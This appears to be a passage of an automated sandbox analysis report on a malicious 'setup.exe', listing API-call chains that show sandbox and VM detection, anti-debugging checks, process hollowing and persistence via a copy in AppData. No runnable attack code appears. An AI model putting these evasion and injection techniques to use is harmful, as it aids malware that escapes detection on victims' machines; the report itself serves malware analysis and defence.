        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,2_2_0040FB98
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,7_2_0040F730
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_00410160 Sleep,PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,7_2_00410160
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,7_2_0040FB98
        Source: C:\Users\user\Desktop\setup.exeThread delayed: delay time: 700000Jump to behavior
        Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Jump to behavior
        Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Jump to behavior
        Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\geo[1].jsonJump to behavior
        Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\Jump to behavior
        Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Jump to behavior
        Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Jump to behavior
        Source: setup.exe, 00000002.00000002.2117422430.000000000079E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}L
        Source: setup.exe, 0000000C.00000002.2256293497.000000000076A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(i
        Source: setup.exe, 00000002.00000002.2117422430.00000000007C5000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000002.00000003.2113278280.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000002.00000002.2117422430.0000000000785000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000002.2789751270.0000000000671000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000002.2789751270.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 0000000C.00000002.2256293497.0000000000802000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000011.00000002.2337567990.000000000096B000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000011.00000002.2337567990.00000000008DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: setup.exe, 00000007.00000002.2789751270.0000000000671000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBn
        Source: setup.exe, 00000011.00000002.2337567990.0000000000927000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnGt
        Source: setup.exe, 00000002.00000002.2117422430.00000000007C5000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000002.00000003.2113278280.00000000007C4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW,P
        Source: C:\Users\user\Desktop\setup.exeAPI call chain: ExitProcess graph end nodegraph_2-45727
        Source: C:\Users\user\Desktop\setup.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_01F3D71C rdtsc 0_2_01F3D71C
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0040D220 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040D220
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_0042A57A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,2_2_0042A57A
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_00481920 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,GetTickCount,Heap32ListFirst,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,GetTickCount,Process32First,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,7_2_00481920
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00405440 LoadLibraryA,GetProcAddress,VirtualProtect,0_2_00405440
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_01F3C0A3 push dword ptr fs:[00000030h]0_2_01F3C0A3
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_02010042 push dword ptr fs:[00000030h]0_2_02010042
        Source: C:\Users\user\Desktop\setup.exeCode function: 5_2_0064A0A3 push dword ptr fs:[00000030h]5_2_0064A0A3
        Source: C:\Users\user\Desktop\setup.exeCode function: 5_2_02070042 push dword ptr fs:[00000030h]5_2_02070042
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_004278D5 GetProcessHeap,2_2_004278D5
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0040D220 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040D220
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0040A348 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040A348
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0040F3BF SetUnhandledExceptionFilter,0_2_0040F3BF
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_004329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_004329EC
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_004329BB SetUnhandledExceptionFilter,2_2_004329BB
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeCode function: 6_2_0040D220 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_0040D220
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeCode function: 6_2_0040A348 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_0040A348
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeCode function: 6_2_0040F3BF SetUnhandledExceptionFilter,6_2_0040F3BF
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_004329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_004329EC
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_004329BB SetUnhandledExceptionFilter,7_2_004329BB

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_02010110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,0_2_02010110
        Source: C:\Users\user\Desktop\setup.exeMemory written: C:\Users\user\Desktop\setup.exe base: 400000 value starts with: 4D5AJump to behavior
        Source: C:\Users\user\Desktop\setup.exeMemory written: C:\Users\user\Desktop\setup.exe base: 400000 value starts with: 4D5AJump to behavior
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeMemory written: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exe base: 400000 value starts with: 4D5A
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeMemory written: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exe base: 400000 value starts with: 4D5A
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,2_2_00419F90
        Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Users\user\Desktop\setup.exe "C:\Users\user\Desktop\setup.exe"Jump to behavior
        Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Users\user\Desktop\setup.exe "C:\Users\user\Desktop\setup.exe" --Admin IsNotAutoStart IsNotTaskJump to behavior
        Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Users\user\Desktop\setup.exe "C:\Users\user\Desktop\setup.exe" --Admin IsNotAutoStart IsNotTaskJump to behavior
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeProcess created: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exe "C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exe" --AutoStart
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeProcess created: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exe "C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exe" --AutoStart
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_020380F6 cpuid 0_2_020380F6
        Source: C:\Users\user\Desktop\setup.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,0_2_00412449
        Source: C:\Users\user\Desktop\setup.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,0_2_00410C7F
        Source: C:\Users\user\Desktop\setup.exeCode function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,0_2_00415420
        Source: C:\Users\user\Desktop\setup.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,0_2_004118DB
        Source: C:\Users\user\Desktop\setup.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,0_2_00409CEA
        Source: C:\Users\user\Desktop\setup.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_004154FA
        Source: C:\Users\user\Desktop\setup.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,0_2_0041089B
        Source: C:\Users\user\Desktop\setup.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,0_2_004124A4
        Source: C:\Users\user\Desktop\setup.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,0_2_00412675
        Source: C:\Users\user\Desktop\setup.exeCode function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,0_2_0041568A
        Source: C:\Users\user\Desktop\setup.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_004122AD
        Source: C:\Users\user\Desktop\setup.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,0_2_00412735
        Source: C:\Users\user\Desktop\setup.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,0_2_00411BC9
        Source: C:\Users\user\Desktop\setup.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,0_2_004127D8
        Source: C:\Users\user\Desktop\setup.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,0_2_0041279C
        Source: C:\Users\user\Desktop\setup.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,0_2_004123A2
        Source: C:\Users\user\Desktop\setup.exeCode function: GetLocaleInfoA,0_2_004157BF
        Source: C:\Users\user\Desktop\setup.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_02050AB6
        Source: C:\Users\user\Desktop\setup.exeCode function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,0_2_0203C8B7
        Source: C:\Users\user\Desktop\setup.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,0_2_0204394D
        Source: C:\Users\user\Desktop\setup.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,0_2_020449EA
        Source: C:\Users\user\Desktop\setup.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,0_2_02043F87
        Source: C:\Users\user\Desktop\setup.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,2_2_0043404A
        Source: C:\Users\user\Desktop\setup.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,2_2_00438178
        Source: C:\Users\user\Desktop\setup.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,2_2_00440116
        Source: C:\Users\user\Desktop\setup.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_004382A2
        Source: C:\Users\user\Desktop\setup.exeCode function: GetLocaleInfoW,_GetPrimaryLen,2_2_0043834F
        Source: C:\Users\user\Desktop\setup.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,2_2_00438423
        Source: C:\Users\user\Desktop\setup.exeCode function: EnumSystemLocalesW,2_2_004387C8
        Source: C:\Users\user\Desktop\setup.exeCode function: GetLocaleInfoW,2_2_0043884E
        Source: C:\Users\user\Desktop\setup.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,2_2_00432B6D
        Source: C:\Users\user\Desktop\setup.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,2_2_00432FAD
        Source: C:\Users\user\Desktop\setup.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,2_2_004335E7
        Source: C:\Users\user\Desktop\setup.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,2_2_00437BB3
        Source: C:\Users\user\Desktop\setup.exeCode function: EnumSystemLocalesW,2_2_00437E27
        Source: C:\Users\user\Desktop\setup.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,2_2_00437E83
        Source: C:\Users\user\Desktop\setup.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,2_2_00437F00
        Source: C:\Users\user\Desktop\setup.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,2_2_0042BF17
        Source: C:\Users\user\Desktop\setup.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,2_2_00437F83
        Source: C:\Users\user\Desktop\setup.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,5_2_020B0AB6
        Source: C:\Users\user\Desktop\setup.exeCode function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,5_2_0209C8B7
        Source: C:\Users\user\Desktop\setup.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,5_2_020A394D
        Source: C:\Users\user\Desktop\setup.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,5_2_020A49EA
        Source: C:\Users\user\Desktop\setup.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,5_2_020A3F87
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,6_2_00412449
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getloca